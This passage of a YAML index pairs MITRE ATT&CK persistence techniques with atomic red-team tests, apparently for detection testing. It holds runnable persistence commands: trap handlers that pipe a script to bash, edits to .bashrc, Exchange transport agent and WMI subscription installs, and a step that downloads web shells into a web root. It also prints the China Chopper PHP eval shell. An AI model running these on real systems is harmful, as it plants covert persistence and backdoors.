Microsoft transport agents to establish + persistent access to systems. Microsoft Exchange transport agents can operate + on email messages passing through the transport pipeline to perform various + tasks such as filtering spam, filtering malicious attachments, journaling, + or adding a corporate signature to the end of all outgoing emails.(Citation: + Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport + agents can be written by application developers and then compiled to .NET + assemblies that are subsequently registered with the Exchange server. Transport + agents will be invoked during a specified stage of email processing and carry + out developer defined tasks. \n\nAdversaries may register a malicious transport + agent to provide a persistence mechanism in Exchange Server that can be triggered + by adversary-specified email events.(Citation: ESET LightNeuron May 2019) + Though a malicious transport agent may be invoked for all emails passing through + the Exchange transport pipeline, the agent can be configured to only carry + out specific tasks in response to adversary defined criteria. For example, + the transport agent may only carry out an action like copying in-transit attachments + and saving them for later exfiltration if the recipient email address matches + an entry on a list provided by the adversary. " + id: attack-pattern--35187df2-31ed-43b6-a1f5-2f1d3d58d3f1 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-25T22:59:59.124Z' + created: '2019-12-12T15:08:20.972Z' + x_mitre_detection: Consider monitoring application logs for abnormal behavior + that may indicate suspicious installation of application software components. + Consider monitoring file locations associated with the installation of new + application software components such as paths from which applications typically + load such extensible components. + x_mitre_data_sources: + - 'File: File Creation' + - 'Application Log: Application Log Content' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - SYSTEM + - Administrator + - root + x_mitre_contributors: + - ESET + - " Christoffer Strömblad" + x_mitre_platforms: + - Linux + - Windows + identifier: T1505.002 + atomic_tests: + - name: Install MS Exchange Transport Agent Persistence + auto_generated_guid: 43e92449-ff60-46e9-83a3-1a38089df94d + description: | + Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla. + More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help + supported_platforms: + - windows + input_arguments: + class_factory: + description: Class factory of transport agent. + type: string + default: Microsoft.Exchange.Security.Interop.SecurityInteropAgentFactory + dll_path: + description: Path of DLL to use as transport agent. + type: path + default: c:\program files\microsoft\Exchange Server\v15\bin\Microsoft.Exchange.Security.Interop.dll + transport_agent_identity: + description: Friendly name of transport agent once installed. + type: string + default: Security Interop Agent + dependencies: + - description: 'Microsoft Exchange SnapIn must be installed + +' + prereq_command: 'Get-TransportAgent -TransportService FrontEnd + +' + get_prereq_command: 'Add-PSSnapin Microsoft.Exchange.Management.PowerShell.SnapIn + +' + executor: + command: | + Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} + Enable-TransportAgent #{transport_agent_identity} + Get-TransportAgent | Format-List Name,Enabled + cleanup_command: | + if(Get-Command "Get-TransportAgent" -ErrorAction Ignore){ + Disable-TransportAgent #{transport_agent_identity} + Uninstall-TransportAgent #{transport_agent_identity} + Get-TransportAgent + } + name: powershell + elevation_required: true + T1546.005: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.005 + url: https://attack.mitre.org/techniques/T1546/005 + - source_name: Trap Manual + url: https://ss64.com/bash/trap.html + description: ss64. (n.d.). trap. Retrieved May 21, 2019. + - source_name: Cyberciti Trap Statements + url: https://bash.cyberciti.biz/guide/Trap_statement + description: Cyberciti. (2016, March 29). Trap statement. Retrieved May 21, + 2019. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Trap + description: |- + Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d. + + Adversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where "command list" will be executed when "signals" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements) + id: attack-pattern--63220765-d418-44de-8fae-694b3912317d + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-03-24T16:43:02.273Z' + created: '2020-01-24T14:17:43.906Z' + x_mitre_version: '1.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: Trap commands must be registered for the shell or programs, + so they appear in files. Monitoring files for suspicious or overly broad trap + commands can narrow down suspicious behavior during an investigation. Monitor + for suspicious processes executed through trap interrupts. + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_platforms: + - macOS + - Linux + identifier: T1546.005 + atomic_tests: + - name: Trap + auto_generated_guid: a74b2e07-5952-4c03-8b56-56274b076b61 + description: | + After exiting the shell, the script will download and execute. + After sending a keyboard interrupt (CTRL+C) the script will download and execute. + supported_platforms: + - macos + - linux + executor: + command: | + trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" EXIT + exit + trap "nohup sh $PathToAtomicsFolder/T1546.005/src/echo-art-fish.sh | bash" SIGINt + name: sh + T1546.004: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.004 + url: https://attack.mitre.org/techniques/T1546/004 + - source_name: intezer-kaiji-malware + url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/ + description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware + turning to Golang. Retrieved December 17, 2020.' + - source_name: bencane blog bashrc + url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/ + description: Benjamin Cane. (2013, September 16). Understanding a little more + about /etc/profile and /etc/bashrc. Retrieved February 25, 2021. + - source_name: anomali-rocke-tactics + url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect + description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining + Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved + December 17, 2020. + - source_name: Linux manual bash invocation + url: https://wiki.archlinux.org/index.php/Bash#Invocation + description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021. + - source_name: Tsunami + url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ + description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware + Targets DVRs, Forms Botnet. Retrieved December 17, 2020. + - source_name: anomali-linux-rabbit + url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat + description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot + Malware Out of a Hat. Retrieved December 17, 2020. + - source_name: Magento + url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html + description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection + Vector. Retrieved December 17, 2020. + - source_name: ScriptingOSX zsh + url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/ + description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration + Files. Retrieved February 25, 2021.' + - source_name: PersistentJXA_leopitt + url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5 + description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell + for macOS. Retrieved January 11, 2021. + - source_name: code_persistence_zsh + url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js + description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js. + Retrieved January 11, 2021. + - source_name: ESF_filemonitor + url: https://objective-see.com/blog/blog_0x48.html + description: Patrick Wardle. (2019, September 17). Writing a File Monitor + with Apple's Endpoint Security Framework. Retrieved December 17, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Unix Shell Configuration Modification + description: "Adversaries may establish persistence through executing malicious + commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s + execute several configuration scripts at different points throughout the session + based on events. For example, when a user opens a command-line interface or + remotely logs in (such as via SSH) a login shell is initiated. The login shell + executes scripts from the system (/etc) and the user’s home directory + (~/) to configure the environment. All login shells on a system + use /etc/profile when initiated. These configuration scripts run at the permission + level of their directory and are often used to set environment variables, + create aliases, and customize the user’s environment. When the shell exits + or terminates, additional shell scripts are executed to ensure the shell exits + appropriately. \n\nAdversaries may attempt to establish persistence by inserting + commands into scripts automatically executed by shells. Using bash as an example, + the default shell for most GNU/Linux systems, adversaries may add commands + that launch malicious binaries into the /etc/profile and /etc/profile.d + files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These + files typically require root permissions to modify and are executed each time + any shell on a system launches. For user level permissions, adversaries can + insert malicious commands into ~/.bash_profile, ~/.bash_login, + or ~/.profile which are sourced when a user opens a command-line + interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: + Linux manual bash invocation) Since the system only executes the first existing + file in the listed order, adversaries have used ~/.bash_profile + to ensure execution. Adversaries have also leveraged the ~/.bashrc + file which is additionally executed if the connection is established remotely + or an additional interactive shell is opened, such as a new tab in the command-line + interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: + Magento) Some malware targets the termination of a program to trigger execution, + adversaries can use the ~/.bash_logout file to execute malicious + commands at the end of a session. \n\nFor macOS, the functionality of this + technique is similar but may leverage zsh, the default shell for macOS 10.15+. + When the Terminal.app is opened, the application launches a zsh login shell + and a zsh interactive shell. The login shell configures the system environment + using /etc/profile, /etc/zshenv, /etc/zprofile, + and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: + code_persistence_zsh) The login shell then configures the user environment + with ~/.zprofile and ~/.zlogin. The interactive + shell uses the ~/.zshrc to configure the user environment. Upon + exiting, /etc/zlogout and ~/.zlogout are executed. + For legacy programs, macOS executes /etc/bashrc on startup." + id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-03-08T15:22:54.089Z' + created: '2020-01-24T14:13:45.936Z' + x_mitre_contributors: + - Robert Wilson + - Tony Lambert, Red Canary + x_mitre_version: '2.0' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - User + - Administrator + x_mitre_detection: "While users may customize their shell profile files, there + are only certain types of commands that typically appear in these files. Monitor + for abnormal commands such as execution of unknown programs, opening network + sockets, or reaching out across the network when user profiles are loaded + during the login process.\n\nMonitor for changes to /etc/profile + and /etc/profile.d, these files should only be modified by system + administrators. MacOS users can leverage Endpoint Security Framework file + events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor + most Linux and macOS systems, a list of file paths for valid shell options + available on a system are located in the /etc/shells file.\n" + x_mitre_data_sources: + - 'Process: Process Creation' + - 'Command: Command Execution' + - 'File: File Creation' + - 'File: File Modification' + x_mitre_platforms: + - Linux + - macOS + identifier: T1546.004 + atomic_tests: + - name: Add command to .bash_profile + auto_generated_guid: 94500ae1-7e31-47e3-886b-c328da46872f + description: 'Adds a command to the .bash_profile file of the current user + +' + supported_platforms: + - macos + - linux + input_arguments: + command_to_add: + description: Command to add to the .bash_profile file + type: string + default: "/path/to/script.py" + executor: + command: 'echo "#{command_to_add}" >> ~/.bash_profile + +' + name: sh + - name: Add command to .bashrc + auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f + description: 'Adds a command to the .bashrc file of the current user + +' + supported_platforms: + - macos + - linux + input_arguments: + command_to_add: + description: Command to add to the .bashrc file + type: string + default: "/path/to/script.py" + executor: + command: 'echo "#{command_to_add}" >> ~/.bashrc + +' + name: sh + T1078: + technique: + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + external_references: + - source_name: mitre-attack + external_id: T1078 + url: https://attack.mitre.org/techniques/T1078 + - external_id: CAPEC-560 + source_name: capec + url: https://capec.mitre.org/data/definitions/560.html + - url: https://technet.microsoft.com/en-us/library/dn535501.aspx + description: Microsoft. (2016, April 15). Attractive Accounts for Credential + Theft. Retrieved June 3, 2016. + source_name: TechNet Credential Theft + - url: https://technet.microsoft.com/en-us/library/dn487457.aspx + description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved + June 3, 2016. + source_name: TechNet Audit Policy + description: |- + Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop. Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence. + + The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise. (Citation: TechNet Credential Theft) + name: Valid Accounts + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + id: attack-pattern--b17a1a56-e99c-403c-8948-561df0cffe81 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: defense-evasion + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: initial-access + modified: '2021-04-12T18:27:52.298Z' + created: '2017-05-31T21:31:00.645Z' + x_mitre_version: '2.2' + x_mitre_data_sources: + - 'User Account: User Account Authentication' + - 'Logon Session: Logon Session Creation' + x_mitre_defense_bypassed: + - Firewall + - Host intrusion prevention systems + - Network intrusion detection system + - Application control + - System access controls + - Anti-virus + x_mitre_detection: |- + Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services. (Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). + + Perform regular audits of domain and local system accounts to detect accounts that may have been created by an adversary for persistence. Checks on these accounts could also include whether default accounts such as Guest have been activated. These audits should also include checks on any appliances and applications for default credentials or SSH keys, and if any are discovered, they should be updated immediately. + x_mitre_permissions_required: + - User + - Administrator + x_mitre_effective_permissions: + - User + - Administrator + x_mitre_platforms: + - Windows + - Azure AD + - Office 365 + - SaaS + - IaaS + - Linux + - macOS + - Google Workspace + - Containers + x_mitre_contributors: + - Yossi Weizman, Azure Defender Research Team + - Netskope + - Mark Wee + - Praetorian + x_mitre_is_subtechnique: false + atomic_tests: [] + T1505.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1505.003 + url: https://attack.mitre.org/techniques/T1505/003 + - external_id: CAPEC-650 + source_name: capec + url: https://capec.mitre.org/data/definitions/650.html + - source_name: Lee 2013 + description: Lee, T., Hanzlik, D., Ahl, I. (2013, August 7). Breaking Down + the China Chopper Web Shell - Part I. Retrieved March 27, 2015. + url: https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html + - url: https://www.us-cert.gov/ncas/alerts/TA15-314A + description: US-CERT. (2015, November 13). Compromised Web Servers and Web + Shells - Threat Awareness and Guidance. Retrieved June 8, 2016. + source_name: US-CERT Alert TA15-314A Web Shells + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Web Shell + description: "Adversaries may backdoor web servers with web shells to establish + persistent access to systems. A Web shell is a Web script that is placed on + an openly accessible Web server to allow an adversary to use the Web server + as a gateway into a network. A Web shell may provide a set of functions to + execute or a command-line interface on the system that hosts the Web server.\n\nIn + addition to a server-side script, a Web shell may have a client interface + program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) + Web shell client).(Citation: Lee 2013) " + id: attack-pattern--5d0d3609-d06d-49e1-b9c9-b544e0c618cb + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2020-09-16T19:34:19.752Z' + created: '2019-12-13T16:46:18.927Z' + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_system_requirements: + - Adversary access to Web server with vulnerability or account to upload and + serve the Web shell file. + x_mitre_permissions_required: + - SYSTEM + - User + x_mitre_detection: "Web shells can be difficult to detect. Unlike other forms + of persistent remote access, they do not initiate connections. The portion + of the Web shell that is on the server may be small and innocuous looking. + The PHP version of the China Chopper Web shell, for example, is the following + short payload: (Citation: Lee 2013) \n\n<?php @eval($_POST['password']);>\n\nNevertheless, + detection mechanisms exist. Process monitoring may be used to detect Web servers + that perform suspicious actions such as running cmd.exe or accessing files + that are not in the Web directory. File monitoring may be used to detect changes + to files in the Web directory of a Web server that do not match with updates + to the Web server's content and may indicate implantation of a Web shell script. + Log authentication attempts to the server and any unusual traffic patterns + to or from the server and internal network. (Citation: US-CERT Alert TA15-314A + Web Shells) " + x_mitre_data_sources: + - 'File: File Creation' + - 'File: File Modification' + - 'Process: Process Creation' + - 'Network Traffic: Network Traffic Content' + - 'Network Traffic: Network Traffic Flow' + - 'Application Log: Application Log Content' + x_mitre_platforms: + - Linux + - Windows + - macOS + identifier: T1505.003 + atomic_tests: + - name: Web Shell Written to Disk + auto_generated_guid: 0a2ce662-1efa-496f-a472-2fe7b080db16 + description: | + This test simulates an adversary leveraging Web Shells by simulating the file modification to disk. + Idea from APTSimulator. + cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx + supported_platforms: + - windows + input_arguments: + web_shell_path: + description: The path to drop the web shell + type: string + default: C:\inetpub\wwwroot + web_shells: + description: Path of Web Shell + type: path + default: PathToAtomicsFolder\T1505.003\src\ + dependency_executor_name: powershell + dependencies: + - description: 'Web shell must exist on disk at specified location (#{web_shells}) + +' + prereq_command: 'if (Test-Path #{web_shells}) {exit 0} else {exit 1} + +' + get_prereq_command: | + New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp" + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx" + executor: + command: 'xcopy #{web_shells} #{web_shell_path} + +' + cleanup_command: 'del #{web_shell_path} /q >nul 2>&1 + +' + name: command_prompt + T1546.003: + technique: + external_references: + - source_name: mitre-attack + external_id: T1546.003 + url: https://attack.mitre.org/techniques/T1546/003 + - url: https://www2.fireeye.com/rs/fireye/images/rpt-m-trends-2015.pdf + description: 'Mandiant. (2015, February 24). M-Trends 2015: A View from the + Front Lines. Retrieved May 18, 2016.' + source_name: Mandiant M-Trends 2015 + - source_name: FireEye WMI SANS 2015 + url: https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/sans-dfir-2015.pdf + description: Devon Kerr. (2015). There's Something About WMI. Retrieved May + 4, 2020. + - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf + description: Ballenthin, W., et al. (2015). Windows Management Instrumentation + (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. + source_name: FireEye WMI 2015 + - url: https://www.secureworks.com/blog/wmi-persistence + description: Dell SecureWorks Counter Threat Unit™ (CTU) Research Team. (2016, + March 28). A Novel WMI Persistence Implementation. Retrieved March 30, 2016. + source_name: Dell WMI Persistence + - source_name: Microsoft MOF May 2018 + url: https://docs.microsoft.com/en-us/windows/win32/wmisdk/managed-object-format--mof- + description: Satran, M. (2018, May 30). Managed Object Format (MOF). Retrieved + January 24, 2020. + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + - description: French, D. (2018, October 9). Detecting & Removing an Attacker’s + WMI Persistence. Retrieved October 11, 2019. + url: https://medium.com/threatpunter/detecting-removing-wmi-persistence-60ccbb7dff96 + source_name: Medium Detecting WMI Persistence + - source_name: Elastic - Hunting for Persistence Part 1 + url: https://www.elastic.co/blog/hunting-for-persistence-using-elastic-security-part-1 + description: 'French, D., Murphy, B. (2020, March 24). Adversary tradecraft + 101: Hunting for persistence using Elastic Security (Part 1). Retrieved + December 21, 2020.' + - source_name: Microsoft Register-WmiEvent + url: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/register-wmievent?view=powershell-5.1 + description: Microsoft. (n.d.). Retrieved January 24, 2020. + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Windows Management Instrumentation Event Subscription + description: |- + Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015) + + Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018) + + WMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges. + id: attack-pattern--910906dd-8c0a-475a-9cc1-5e029e2fad58 + type: attack-pattern + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + - kill_chain_name: mitre-attack + phase_name: persistence + modified: '2021-04-13T21:32:54.094Z' + created: '2020-01-24T14:07:56.276Z' + x_mitre_contributors: + - Brent Murphy, Elastic + - David French, Elastic + x_mitre_version: '1.1' + x_mitre_is_subtechnique: true + x_mitre_permissions_required: + - Administrator + - SYSTEM + x_mitre_detection: |- + Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1) + + Monitor processes and command-line arguments that can be used to register WMI persistence, such as the Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process). + x_mitre_data_sources: + - 'Command: Command Execution' + - 'Process: Process Creation' + - 'WMI: WMI Creation' + x_mitre_platforms: + - Windows + identifier: T1546.003 + atomic_tests: + - name: Persistence via WMI Event Subscription + auto_generated_guid: 3c64f177-28e2-49eb-a799-d767b24dd1e0 + description: | + Run from an administrator powershell window. After running, reboot the victim machine. + After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. + + Code references + + https://gist.github.com/mattifestation/7fe1df7ca2f08cbfa3d067def00c01af + + https://github.com/EmpireProject/Empire/blob/master/data/module_source/persistence/Persistence.psm1#L545 + supported_platforms: + - windows + executor: + command: | + $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + EventNameSpace='root\CimV2'; + QueryLanguage="WQL"; + Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"}; + $Filter=New-CimInstance -Namespace root/subscription -ClassName __EventFilter -Property $FilterArgs + + $ConsumerArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; + CommandLineTemplate="$($Env:SystemRoot)\System32\notepad.exe";} + $Consumer=New-CimInstance -Namespace root/subscription -ClassName CommandLineEventConsumer -Property $ConsumerArgs + + $FilterToConsumerArgs = @{ + Filter = [Ref] $Filter; + Consumer = [Ref] $Consumer; + } + $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassName __FilterToConsumerBinding -Property $FilterToConsumerArgs + cleanup_command: | + $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" + $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" + $FilterConsumerBindingToCleanup = Get-WmiObject -Namespace root/subscription -Query "REFERENCES OF {$($EventConsumerToCleanup.__RELPATH)} WHERE ResultClass = __FilterToConsumerBinding" -ErrorAction SilentlyContinue + $FilterConsumerBindingToCleanup | Remove-WmiObject + $EventConsumerToCleanup | Remove-WmiObject + $EventFilterToCleanup | Remove-WmiObject + name: powershell + elevation_required: true + T1543.003: + technique: + created: '2020-01-17T19:13:50.402Z' + modified: '2020-09-16T15:49:58.490Z' + kill_chain_phases: + - kill_chain_name: mitre-attack + phase_name: persistence + - kill_chain_name: mitre-attack + phase_name: privilege-escalation + type: attack-pattern + external_references: + - source_name: mitre-attack + external_id: T1543.003 + url: https://attack.mitre.org/techniques/T1543/003 + - external_id: CAPEC-478 + source_name: capec + url: https://capec.mitre.org/data/definitions/478.html + - external_id: CAPEC-550 + source_name: capec + url: https://capec.mitre.org/data/definitions/550.html + - external_id: CAPEC-551 + source_name: capec + url: https://capec.mitre.org/data/definitions/551.html + - url: https://technet.microsoft.com/en-us/library/cc772408.aspx + description: Microsoft. (n.d.). Services. Retrieved June 7, 2016. + source_name: TechNet Services + - url: https://technet.microsoft.com/en-us/sysinternals/bb963902 + description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. + Retrieved June 6, 2016. + source_name: TechNet Autoruns + - url: https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697 + description: 'Miroshnikov, A. & Hall, J. (2017, April 18). 4697(S): A service + was installed in the system. Retrieved August 7, 2018.' + source_name: Microsoft 4697 APR 2017 + - url: https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection + description: Hardy, T. & Hall, J. (2018, February 15). Use Windows Event Forwarding + to help with intrusion detection. Retrieved August 7, 2018. + source_name: Microsoft Windows Event Forwarding FEB 2018 + object_marking_refs: + - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 + created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 + name: Windows Service + description: "Adversaries may create or modify Windows services to repeatedly + execute malicious payloads as part of persistence. When Windows boots up, + it starts programs or applications called services that perform background + system functions.(Citation: TechNet Services) Windows service configuration + information, including the file path to the service's executable or recovery + programs/commands, is stored in the Windows Registry. Service configurations + can be modified using utilities such as sc.exe and [Reg](https://attack.mitre.org/software/S0075). + \n\nAdversaries may install a new service or modify an existing service by + using system utilities to interact with services, by directly modifying the + Registry, or by using custom tools to interact with the Windows API. Adversaries + may configure services to execute at startup in order to persist on a system.\n\nAn + adversary may also incorporate [Masquerading](https://attack.mitre.org/techniques/T1036) + by using a service name from a related operating system or benign software, + or by modifying existing services to make detection analysis more challenging. + Modifying existing services may interrupt their functionality or may enable + services that are disabled or otherwise not commonly used. \n\nServices may + be created with administrator privileges but are executed under SYSTEM privileges, + so an adversary may also use a service to escalate privileges from administrator + to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). " + id: attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32 + x_mitre_contributors: + - Matthew Demaske, Adaptforward + - Travis Smith, Tripwire + - Pedro Harrison + x_mitre_data_sources: + - 'Service: Service Creation' + - 'Service: Service Modification' + - 'Process: Process Creation' + - 'Process: OS API Execution' + - 'Command: Command Execution' + - 'Windows Registry: Windows Registry Key Creation' + - 'Windows Registry: Windows Registry Key Modification' + x_mitre_effective_permissions: + - Administrator + - SYSTEM + x_mitre_detection: "Monitor processes and command-line arguments for actions + that could create or modify services. Command-line invocation of tools capable + of adding or modifying services may be unusual, depending on how systems are + typically used in a particular environment. Services may also be modified + through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) + and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional + logging may need to be configured to gather the appropriate data. Remote access + tools with built-in features may also interact directly with the Windows API + to perform these functions outside of typical system utilities. Collect service + utility execution and service binary path arguments used for analysis. Service + binary paths may even be changed to execute commands or scripts. \n\nLook + for changes to service Registry entries that do not correlate with known software, + patch cycles, etc. Service information is stored in the Registry at HKLM\\SYSTEM\\CurrentControlSet\\Services. + Changes to the binary path and the service startup type changed from manual + or disabled to automatic, if it does not typically do so, may be suspicious. + Tools such as Sysinternals Autoruns may also be used to detect system service + changes that could be attempts at persistence.(Citation: TechNet Autoruns) + \ \n\nCreation of new services may generate an alterable event (ex: Event + ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft + Windows Event Forwarding FEB 2018)). New, benign 